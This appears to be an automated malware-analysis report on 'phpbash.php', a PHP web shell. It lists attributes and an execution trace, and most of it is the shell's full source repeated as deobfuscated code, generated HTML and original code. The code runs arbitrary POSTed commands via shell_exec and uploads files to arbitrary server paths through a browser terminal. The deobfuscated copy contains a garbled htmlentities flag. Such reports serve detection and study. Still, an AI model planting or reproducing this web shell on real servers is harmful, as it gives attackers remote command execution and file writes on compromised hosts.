PHP Malware Analysis
phpbash.php
md5: 4f625fa597c0152266940817daba3d45
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- shell_exec (Deobfuscated, Original)
Files
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
/* phpbash by Alexander Reid (Arrexel) */
if (isset($_POST['cmd'])) {
$output = preg_split('/[\\n]/', shell_exec($_POST['cmd'] . " 2>&1"));
foreach ($output as $line) {
echo htmlentities($line, "ENT_YUO\\uS", 'UTF-8') . "<br>";
}
die;
} else {
if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
$filename = $_FILES["file"]["name"];
$path = $_POST['path'];
if ($path != "/") {
$path .= "/";
}
if (move_uploaded_file($_FILES["file"]["tmp_name"], $path . $filename)) {
echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
} else {
echo "Error uploading " . htmlentities($filename);
}
die;
}
}
?>
<html>
<head>
<title></title>
<style>
html, body {
max-width: 100%;
}
body {
width: 100%;
height: 100%;
margin: 0;
background: #000;
}
body, .inputtext {
font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
font-size: 14px;
font-style: normal;
font-variant: normal;
font-weight: 400;
line-height: 20px;
overflow: hidden;
}
.console {
width: 100%;
height: 100%;
margin: auto;
position: absolute;
color: #fff;
}
.output {
width: auto;
height: auto;
position: absolute;
overflow-y: scroll;
top: 0;
bottom: 30px;
left: 5px;
right: 0;
line-height: 20px;
}
.input form {
position: relative;
margin-bottom: 0px;
}
.username {
height: 30px;
width: auto;
padding-left: 5px;
line-height: 30px;
float: left;
}
.input {
border-top: 1px solid #333333;
width: 100%;
height: 30px;
position: absolute;
bottom: 0;
}
.inputtext {
width: auto;
height: 30px;
bottom: 0px;
margin-bottom: 0px;
background: #000;
border: 0;
float: left;
padding-left: 8px;
color: #fff;
}
.inputtext:focus {
outline: none;
}
::-webkit-scrollbar {
width: 12px;
}
::-webkit-scrollbar-track {
background: #101010;
}
::-webkit-scrollbar-thumb {
background: #303030;
}
</style>
</head>
<body>
<div class="console">
<div class="output" id="output"></div>
<div class="input" id="input">
<form id="form" method="GET" onSubmit="sendCommand()">
<div class="username" id="username"></div>
<input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
</form>
</div>
</div>
<form id="upload" method="POST" style="display: none;">
<input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
</form>
<script type="text/javascript">
var username = "";
var hostname = "";
var currentDir = "";
var previousDir = "";
var defaultDir = "";
var commandHistory = [];
var currentCommand = 0;
var inputTextElement = document.getElementById('inputtext');
var inputElement = document.getElementById("input");
var outputElement = document.getElementById("output");
var usernameElement = document.getElementById("username");
var uploadFormElement = document.getElementById("upload");
var fileBrowserElement = document.getElementById("filebrowser");
getShellInfo();
function getShellInfo() {
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
var parsedResponse = request.responseText.split("<br>");
username = parsedResponse[0];
hostname = parsedResponse[1];
currentDir = parsedResponse[2].replace(new RegExp("/", "g"), "/");
defaultDir = currentDir;
usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
updateInputWidth();
}
};
request.open("POST", "", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.send("cmd=whoami; hostname; pwd");
}
function sendCommand() {
var request = new XMLHttpRequest();
var command = inputTextElement.value;
var originalCommand = command;
var originalDir = currentDir;
var cd = false;
commandHistory.push(originalCommand);
switchCommand(commandHistory.length);
inputTextElement.value = "";
var parsedCommand = command.split(" ");
if (parsedCommand[0] == "cd") {
cd = true;
if (parsedCommand.length == 1) {
command = "cd "+defaultDir+"; pwd";
} else if (parsedCommand[1] == "-") {
command = "cd "+previousDir+"; pwd";
} else {
command = "cd "+currentDir+"; "+command+"; pwd";
}
} else if (parsedCommand[0] == "clear") {
outputElement.innerHTML = "";
return false;
} else if (parsedCommand[0] == "upload") {
fileBrowserElement.click();
return false;
} else {
command = "cd "+currentDir+"; " + command;
}
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
if (cd) {
var parsedResponse = request.responseText.split("<br>");
previousDir = currentDir;
currentDir = parsedResponse[0].replace(new RegExp("/", "g"), "/");
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
} else {
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
outputElement.scrollTop = outputElement.scrollHeight;
}
updateInputWidth();
}
};
request.open("POST", "", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.send("cmd="+encodeURIComponent(command));
return false;
}
function uploadFile() {
var formData = new FormData();
formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
formData.append('path', currentDir);
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
outputElement.innerHTML += request.responseText+"<br>";
}
};
request.open("POST", "", true);
request.send(formData);
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
}
function updateInputWidth() {
inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
}
document.onkeydown = checkForArrowKeys;
function checkForArrowKeys(e) {
e = e || window.event;
if (e.keyCode == '38') {
previousCommand();
} else if (e.keyCode == '40') {
nextCommand();
}
}
function previousCommand() {
if (currentCommand != 0) {
switchCommand(currentCommand-1);
}
}
function nextCommand() {
if (currentCommand != commandHistory.length) {
switchCommand(currentCommand+1);
}
}
function switchCommand(newCommand) {
currentCommand = newCommand;
if (currentCommand == commandHistory.length) {
inputTextElement.value = "";
} else {
inputTextElement.value = commandHistory[currentCommand];
setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);
}
}
document.getElementById("form").addEventListener("submit", function(event){
event.preventDefault()
});
</script>
</body>
</html>
Execution traces
data/traces/4f625fa597c0152266940817daba3d45_trace-1676257702.5687.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:08:48.466485]
1 0 1 0.000161 393528
1 3 0 0.000264 412040 {main} 1 /var/www/html/uploads/phpbash.php 0 0
1 3 1 0.000401 420344
0.000425 314240
TRACE END [2023-02-13 01:08:48.466781]
Generated HTML code
<html><head>
<title></title>
<style>
html, body {
max-width: 100%;
}
body {
width: 100%;
height: 100%;
margin: 0;
background: #000;
}
body, .inputtext {
font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
font-size: 14px;
font-style: normal;
font-variant: normal;
font-weight: 400;
line-height: 20px;
overflow: hidden;
}
.console {
width: 100%;
height: 100%;
margin: auto;
position: absolute;
color: #fff;
}
.output {
width: auto;
height: auto;
position: absolute;
overflow-y: scroll;
top: 0;
bottom: 30px;
left: 5px;
right: 0;
line-height: 20px;
}
.input form {
position: relative;
margin-bottom: 0px;
}
.username {
height: 30px;
width: auto;
padding-left: 5px;
line-height: 30px;
float: left;
}
.input {
border-top: 1px solid #333333;
width: 100%;
height: 30px;
position: absolute;
bottom: 0;
}
.inputtext {
width: auto;
height: 30px;
bottom: 0px;
margin-bottom: 0px;
background: #000;
border: 0;
float: left;
padding-left: 8px;
color: #fff;
}
.inputtext:focus {
outline: none;
}
::-webkit-scrollbar {
width: 12px;
}
::-webkit-scrollbar-track {
background: #101010;
}
::-webkit-scrollbar-thumb {
background: #303030;
}
</style>
</head>
<body>
<div class="console">
<div class="output" id="output"></div>
<div class="input" id="input">
<form id="form" method="GET" onsubmit="sendCommand()">
<div class="username" id="username"><div style="color: #ff0000; display: inline;">www-data@osboxes</div>:/var/www/html#</div>
<input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus="" style="width: 1565px;">
</form>
</div>
</div>
<form id="upload" method="POST" style="display: none;">
<input type="file" name="file" id="filebrowser" onchange="uploadFile()">
</form>
<script type="text/javascript">
var username = "";
var hostname = "";
var currentDir = "";
var previousDir = "";
var defaultDir = "";
var commandHistory = [];
var currentCommand = 0;
var inputTextElement = document.getElementById('inputtext');
var inputElement = document.getElementById("input");
var outputElement = document.getElementById("output");
var usernameElement = document.getElementById("username");
var uploadFormElement = document.getElementById("upload");
var fileBrowserElement = document.getElementById("filebrowser");
getShellInfo();
function getShellInfo() {
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
var parsedResponse = request.responseText.split("<br>");
username = parsedResponse[0];
hostname = parsedResponse[1];
currentDir = parsedResponse[2].replace(new RegExp("/", "g"), "/");
defaultDir = currentDir;
usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
updateInputWidth();
}
};
request.open("POST", "", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.send("cmd=whoami; hostname; pwd");
}
function sendCommand() {
var request = new XMLHttpRequest();
var command = inputTextElement.value;
var originalCommand = command;
var originalDir = currentDir;
var cd = false;
commandHistory.push(originalCommand);
switchCommand(commandHistory.length);
inputTextElement.value = "";
var parsedCommand = command.split(" ");
if (parsedCommand[0] == "cd") {
cd = true;
if (parsedCommand.length == 1) {
command = "cd "+defaultDir+"; pwd";
} else if (parsedCommand[1] == "-") {
command = "cd "+previousDir+"; pwd";
} else {
command = "cd "+currentDir+"; "+command+"; pwd";
}
} else if (parsedCommand[0] == "clear") {
outputElement.innerHTML = "";
return false;
} else if (parsedCommand[0] == "upload") {
fileBrowserElement.click();
return false;
} else {
command = "cd "+currentDir+"; " + command;
}
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
if (cd) {
var parsedResponse = request.responseText.split("<br>");
previousDir = currentDir;
currentDir = parsedResponse[0].replace(new RegExp("/", "g"), "/");
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
} else {
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
outputElement.scrollTop = outputElement.scrollHeight;
}
updateInputWidth();
}
};
request.open("POST", "", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.send("cmd="+encodeURIComponent(command));
return false;
}
function uploadFile() {
var formData = new FormData();
formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
formData.append('path', currentDir);
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
outputElement.innerHTML += request.responseText+"<br>";
}
};
request.open("POST", "", true);
request.send(formData);
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
}
function updateInputWidth() {
inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
}
document.onkeydown = checkForArrowKeys;
function checkForArrowKeys(e) {
e = e || window.event;
if (e.keyCode == '38') {
previousCommand();
} else if (e.keyCode == '40') {
nextCommand();
}
}
function previousCommand() {
if (currentCommand != 0) {
switchCommand(currentCommand-1);
}
}
function nextCommand() {
if (currentCommand != commandHistory.length) {
switchCommand(currentCommand+1);
}
}
function switchCommand(newCommand) {
currentCommand = newCommand;
if (currentCommand == commandHistory.length) {
inputTextElement.value = "";
} else {
inputTextElement.value = commandHistory[currentCommand];
setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);
}
}
document.getElementById("form").addEventListener("submit", function(event){
event.preventDefault()
});
</script>
</body></html>Original PHP code
<?php
/* phpbash by Alexander Reid (Arrexel) */
if (ISSET($_POST['cmd'])) {
$output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
foreach ($output as $line) {
echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
}
die();
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
$filename = $_FILES["file"]["name"];
$path = $_POST['path'];
if ($path != "/") {
$path .= "/";
}
if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
} else {
echo "Error uploading " . htmlentities($filename);
}
die();
}
?>
<html>
<head>
<title></title>
<style>
html, body {
max-width: 100%;
}
body {
width: 100%;
height: 100%;
margin: 0;
background: #000;
}
body, .inputtext {
font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
font-size: 14px;
font-style: normal;
font-variant: normal;
font-weight: 400;
line-height: 20px;
overflow: hidden;
}
.console {
width: 100%;
height: 100%;
margin: auto;
position: absolute;
color: #fff;
}
.output {
width: auto;
height: auto;
position: absolute;
overflow-y: scroll;
top: 0;
bottom: 30px;
left: 5px;
right: 0;
line-height: 20px;
}
.input form {
position: relative;
margin-bottom: 0px;
}
.username {
height: 30px;
width: auto;
padding-left: 5px;
line-height: 30px;
float: left;
}
.input {
border-top: 1px solid #333333;
width: 100%;
height: 30px;
position: absolute;
bottom: 0;
}
.inputtext {
width: auto;
height: 30px;
bottom: 0px;
margin-bottom: 0px;
background: #000;
border: 0;
float: left;
padding-left: 8px;
color: #fff;
}
.inputtext:focus {
outline: none;
}
::-webkit-scrollbar {
width: 12px;
}
::-webkit-scrollbar-track {
background: #101010;
}
::-webkit-scrollbar-thumb {
background: #303030;
}
</style>
</head>
<body>
<div class="console">
<div class="output" id="output"></div>
<div class="input" id="input">
<form id="form" method="GET" onSubmit="sendCommand()">
<div class="username" id="username"></div>
<input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
</form>
</div>
</div>
<form id="upload" method="POST" style="display: none;">
<input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
</form>
<script type="text/javascript">
var username = "";
var hostname = "";
var currentDir = "";
var previousDir = "";
var defaultDir = "";
var commandHistory = [];
var currentCommand = 0;
var inputTextElement = document.getElementById('inputtext');
var inputElement = document.getElementById("input");
var outputElement = document.getElementById("output");
var usernameElement = document.getElementById("username");
var uploadFormElement = document.getElementById("upload");
var fileBrowserElement = document.getElementById("filebrowser");
getShellInfo();
function getShellInfo() {
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
var parsedResponse = request.responseText.split("<br>");
username = parsedResponse[0];
hostname = parsedResponse[1];
currentDir = parsedResponse[2].replace(new RegExp("/", "g"), "/");
defaultDir = currentDir;
usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
updateInputWidth();
}
};
request.open("POST", "", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.send("cmd=whoami; hostname; pwd");
}
function sendCommand() {
var request = new XMLHttpRequest();
var command = inputTextElement.value;
var originalCommand = command;
var originalDir = currentDir;
var cd = false;
commandHistory.push(originalCommand);
switchCommand(commandHistory.length);
inputTextElement.value = "";
var parsedCommand = command.split(" ");
if (parsedCommand[0] == "cd") {
cd = true;
if (parsedCommand.length == 1) {
command = "cd "+defaultDir+"; pwd";
} else if (parsedCommand[1] == "-") {
command = "cd "+previousDir+"; pwd";
} else {
command = "cd "+currentDir+"; "+command+"; pwd";
}
} else if (parsedCommand[0] == "clear") {
outputElement.innerHTML = "";
return false;
} else if (parsedCommand[0] == "upload") {
fileBrowserElement.click();
return false;
} else {
command = "cd "+currentDir+"; " + command;
}
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
if (cd) {
var parsedResponse = request.responseText.split("<br>");
previousDir = currentDir;
currentDir = parsedResponse[0].replace(new RegExp("/", "g"), "/");
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
} else {
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
outputElement.scrollTop = outputElement.scrollHeight;
}
updateInputWidth();
}
};
request.open("POST", "", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.send("cmd="+encodeURIComponent(command));
return false;
}
function uploadFile() {
var formData = new FormData();
formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
formData.append('path', currentDir);
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
outputElement.innerHTML += request.responseText+"<br>";
}
};
request.open("POST", "", true);
request.send(formData);
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
}
function updateInputWidth() {
inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
}
document.onkeydown = checkForArrowKeys;
function checkForArrowKeys(e) {
e = e || window.event;
if (e.keyCode == '38') {
previousCommand();
} else if (e.keyCode == '40') {
nextCommand();
}
}
function previousCommand() {
if (currentCommand != 0) {
switchCommand(currentCommand-1);
}
}
function nextCommand() {
if (currentCommand != commandHistory.length) {
switchCommand(currentCommand+1);
}
}
function switchCommand(newCommand) {
currentCommand = newCommand;
if (currentCommand == commandHistory.length) {
inputTextElement.value = "";
} else {
inputTextElement.value = commandHistory[currentCommand];
setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);
}
}
document.getElementById("form").addEventListener("submit", function(event){
event.preventDefault()
});
</script>
</body>
</html>